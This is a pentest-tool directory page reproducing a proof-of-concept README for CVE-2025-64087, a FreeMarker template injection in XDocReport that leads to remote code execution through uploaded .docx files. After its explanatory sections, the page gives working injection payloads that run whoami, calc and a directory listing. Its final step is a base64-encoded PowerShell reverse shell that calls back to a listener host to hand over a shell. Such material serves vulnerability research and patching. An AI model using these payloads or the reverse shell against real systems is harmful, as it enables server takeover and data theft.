Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-64087-SSTI- β€” CVE-2025-64087 (SSTI) | Kitploit
Tools/GitHubGitHub/at190510-cuong/cve-2025-64087-ssti-
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & EducationPayload Development
GitHubat190510-cuong/cve-2025-64087-ssti-

CVE-2025-64087-SSTI-

CVE-2025-64087 (SSTI)

View Repository
1156 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2025-64087 (SSTI FreeMarker)

Server-Side Template Injection (SSTI) in XDocReport allows Remote Code Execution via Apache FreeMarker engine

Bug Definition

Overview of the vulnerability

  • Server-Side Template Injection (SSTI) is a web security vulnerability that allows attackers to inject malicious code into templates used by content management systems (CMS) and web frameworks, enabling remote attacks, extraction of sensitive information, or system intrusion activities.

  • SSTI is a variant of Injection vulnerabilities (such as SQL Injection, XSS, etc.), where attackers exploit the use of template systems to deploy remote malicious code. When an SSTI attack is successfully executed, attackers can run their own code on the server side, allowing them to perform remote attacks, such as gathering sensitive information, conducting system intrusion activities, and accessing unauthorized resources.

  • SSTI vulnerabilities often occur due to the use of unsafe template systems, or due to failure to validate and process input parameters before inserting them into templates. If an SSTI attack is successfully carried out, the consequences can be severe and cause significant damage to the targeted organization.

Business impact

  • The SSTI vulnerability can lead to several serious consequences, including:

  • Remote Code Execution: Attackers can exploit this vulnerability to execute malicious code on the server, enabling data theft, performing illegal actions on the system, or even taking full control of the server.

  • Exposure of sensitive information: SSTI can allow attackers to read, modify, or delete files on the server. If these files contain sensitive information, such as accounts and passwords, the attacker can easily disclose this information.

  • User intimidation or phishing attacks: Attackers can use SSTI to conduct intimidation or phishing attacks by altering website content or adding fake custom buttons. If users click on these buttons, attackers can steal user information or install malware on their computers.

Severity: CRITICAL

image

Description and Impact

A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the FreeMarker engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).

The personnel management website allows users to upload .docx documents to the system. During processing, the application uses the FreeMarker template engine (in the file FreemarkerTemplateEngine.java) to render the content ${"freemarker.template.utility.Execute"?new()("whoami")} without any input content validation or filtering mechanism. This vulnerability allows an attacker to inject malicious expressions into the .docx file (template), leading to Remote Code Execution (RCE) on the server, which can be exploited to steal information or take control of the system.

Affected component

fr.opensagres.xdocreport.template.freemarker β€” XDocReport (versions 1.0.0 through 2.1.0).

Root cause analysis

  • In the file https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.freemarker/src/main/java/fr/opensagres/xdocreport/template/freemarker/FreemarkerTemplateEngine.java, there is no validation of the input xdoc file content. The template content is loaded directly and passed to process(context, writer, template) to be handled by the FreeMarker engine without any sandboxing or restriction mechanisms for directives/expressions. As a result, an attacker can provide a template containing malicious FreeMarker expressions/commands, leading to Remote Code Execution (RCE).

image

Step to reproduce

  1. The user uploads a .docx file containing the following payload:``` ${"freemarker.template.utility.Execute"?new()("calc")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

2. See that the execution is successful and the calc application opens

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

3. Similarly, to get the information of the user running on the system with the payload:```
${"freemarker.template.utility.Execute"?new()("whoami")}

image

image

  1. You can see that the .docx file, after processing by the template engine, has returned system data

image

  1. Similarly with the following payload:``` ${"freemarker.template.utility.Execute"?new()("cmd /c dir d:")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

6. Elevate impact to RCE

- Listening machine is wsl with IP address `172.26.208.130`

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

- Exploit with the following payload:

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)```java
${"freemarker.template.utility.Execute"?new()("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAyADYALgAyADAAOAAuADEAMwAwACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==")}

image

  • Feed the .docx file to xdocreport for processing

image

  • Observe that a shell is captured and returned on the WSL machine
Download Tool